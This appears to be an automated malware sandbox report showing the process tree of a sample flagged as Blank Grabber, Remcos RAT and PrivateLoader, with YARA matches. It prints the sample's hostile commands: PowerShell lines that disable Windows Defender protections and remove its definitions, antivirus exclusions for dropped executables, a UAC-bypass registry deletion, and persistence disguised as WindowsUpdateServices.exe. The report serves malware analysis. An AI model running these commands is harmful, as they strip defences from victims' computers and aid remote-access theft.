                                                                                                                                                                                                                                MD5 hash:CB769D049C4541F926F5D6B8D1FF5929
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000027.00000003.2469980302.000001FEA781A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000027.00000003.2469980302.000001FEA7818000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:40
                                                                                                                                                                                                                                Start time:16:41:24
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text"
                                                                                                                                                                                                                                Imagebase:0x7ff6ccb20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:41
                                                                                                                                                                                                                                Start time:16:41:24
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:42
                                                                                                                                                                                                                                Start time:16:41:24
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\wevtutil.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text
                                                                                                                                                                                                                                Imagebase:0x7ff757290000
                                                                                                                                                                                                                                File size:278'016 bytes
                                                                                                                                                                                                                                MD5 hash:1AAE26BD68B911D0420626A27070EB8D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:43
                                                                                                                                                                                                                                Start time:16:41:24
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "reg delete hkcu\Software\Classes\ms-settings /f"
                                                                                                                                                                                                                                Imagebase:0x7ff6ccb20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:44
                                                                                                                                                                                                                                Start time:16:41:24
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

Target ID: 45
Start time: 16:41:24
Start date: 08/05/2024
Path: C:\Windows\System32\reg.exe
Wow64 process (32bit): false
Commandline: reg delete hkcu\Software\Classes\ms-settings /f
Imagebase: 0x7ff60ebe0000
File size: 77'312 bytes
MD5 hash: 227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 46
Start time: 16:41:25
Start date: 08/05/2024
Path: C:\Users\user\AppData\Local\Temp\DE5A.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\DE5A.exe"
Imagebase: 0x7ff6c99c0000
File size: 8'850'847 bytes
MD5 hash: CB769D049C4541F926F5D6B8D1FF5929
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 0000002E.00000003.2491861380.000001E8E77E6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000002E.00000003.2495061783.000001E8E7F87000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000002E.00000003.2495061783.000001E8E7F87000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000002E.00000003.2495061783.000001E8E7F87000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 0000002E.00000002.2582736276.000001E8E77F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000002E.00000003.2496650937.000001E8E8091000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 0000002E.00000003.2491188637.000001E8E77E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 0000002E.00000002.2582242198.000001E8E75F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000002E.00000003.2495171507.000001E8E7A12000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited: true

Target ID: 48
Start time: 16:41:27
Start date: 08/05/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'"
Imagebase: 0x7ff6ccb20000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 49
Start time: 16:41:27
Start date: 08/05/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase: 0x7ff6ccb20000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 50
Start time: 16:41:27
Start date: 08/05/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 51
Start time: 16:41:27
Start date: 08/05/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 52
Start time: 16:41:27
Start date: 08/05/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 53
Start time: 16:41:27
Start date: 08/05/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

                                                                                                                                                                                                                                Target ID:54
                                                                                                                                                                                                                                Start time:16:41:27
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
                                                                                                                                                                                                                                Imagebase:0x7ff6ccb20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:55
                                                                                                                                                                                                                                Start time:16:41:27
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "start bound.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6ccb20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:56
                                                                                                                                                                                                                                Start time:16:41:28
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:57
                                                                                                                                                                                                                                Start time:16:41:28
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:58
                                                                                                                                                                                                                                Start time:16:41:28
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                Imagebase:0x7ff6ccb20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:59
                                                                                                                                                                                                                                Start time:16:41:28
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:60
                                                                                                                                                                                                                                Start time:16:41:28
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                Imagebase:0x7ff75f0b0000
                                                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:61
                                                                                                                                                                                                                                Start time:16:41:28
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\bound.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:bound.exe
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:494'592 bytes
                                                                                                                                                                                                                                MD5 hash:E5C79A33139A13DAAC52DA8DD0ABFC68
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000003D.00000003.2501512368.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000003D.00000003.2501512368.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000003D.00000003.2501512368.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000003D.00000002.2542712079.000000000068E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000003D.00000000.2500162285.0000000000401000.00000020.00000001.01000000.00000030.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000003D.00000000.2500248903.0000000000459000.00000002.00000001.01000000.00000030.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000003D.00000000.2500248903.0000000000459000.00000002.00000001.01000000.00000030.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000003D.00000000.2500248903.0000000000459000.00000002.00000001.01000000.00000030.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000003D.00000002.2539602011.0000000000459000.00000002.00000001.01000000.00000030.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000003D.00000002.2539602011.0000000000459000.00000002.00000001.01000000.00000030.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000003D.00000002.2539602011.0000000000459000.00000002.00000001.01000000.00000030.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000003D.00000002.2538043211.0000000000401000.00000020.00000001.01000000.00000030.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:62
                                                                                                                                                                                                                                Start time:16:41:28
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                                                                                                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:63
                                                                                                                                                                                                                                Start time:16:41:28
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                Imagebase:0x7ff6ccb20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:64
                                                                                                                                                                                                                                Start time:16:41:28
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:65
                                                                                                                                                                                                                                Start time:16:41:28
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                Imagebase:0x7ff741b40000
                                                                                                                                                                                                                                File size:576'000 bytes
                                                                                                                                                                                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:66
                                                                                                                                                                                                                                Start time:16:41:31
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:494'592 bytes
                                                                                                                                                                                                                                MD5 hash:E5C79A33139A13DAAC52DA8DD0ABFC68
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000042.00000002.2546887311.0000000000459000.00000002.00000001.01000000.00000031.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000042.00000002.2546887311.0000000000459000.00000002.00000001.01000000.00000031.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000042.00000002.2546887311.0000000000459000.00000002.00000001.01000000.00000031.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000042.00000003.2544077192.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000042.00000000.2533901161.0000000000459000.00000002.00000001.01000000.00000031.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000042.00000000.2533901161.0000000000459000.00000002.00000001.01000000.00000031.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000042.00000000.2533901161.0000000000459000.00000002.00000001.01000000.00000031.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000042.00000000.2533489068.0000000000401000.00000020.00000001.01000000.00000031.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000042.00000002.2546695187.0000000000401000.00000020.00000001.01000000.00000031.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000042.00000002.2550012688.0000000000630000.00000040.10000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, Author: unknown
                                                                                                                                                                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, Author: unknown
                                                                                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, Author: ditekSHen
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:67
                                                                                                                                                                                                                                Start time:16:41:32
                                                                                                                                                                                                                                Start date:08/05/2024
                                                                                                                                                                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"c:\program files (x86)\internet explorer\iexplore.exe"
                                                                                                                                                                                                                                Imagebase:0xdc0000
                                                                                                                                                                                                                                File size:828'368 bytes
                                                                                                                                                                                                                                MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000043.00000002.2904070426.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000043.00000002.2902843382.0000000003300000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
